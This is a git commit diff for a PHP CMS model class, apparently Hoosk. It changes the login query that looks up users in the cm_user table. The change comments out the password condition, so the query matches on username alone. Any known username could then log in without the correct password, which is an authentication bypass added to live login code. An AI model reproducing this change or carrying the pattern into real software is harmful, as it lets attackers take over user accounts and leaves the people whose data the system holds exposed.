This commit is contained in:
pakerpale
2020-11-08 18:34:31 +09:00
parent 20c9739ba9
commit b5f92c5127
3151 changed files with 928399 additions and 28 deletions

View File

@@ -160,7 +160,7 @@ class Hoosk_model extends MY_Model
{
$this->db->select("*");
$this->db->where("userName", $username);
$this->db->where("password", $password);
// $this->db->where("password", $password);
$query = $this->db->get("cm_user");
if ($query->num_rows() > 0) {
foreach ($query->result() as $rows) {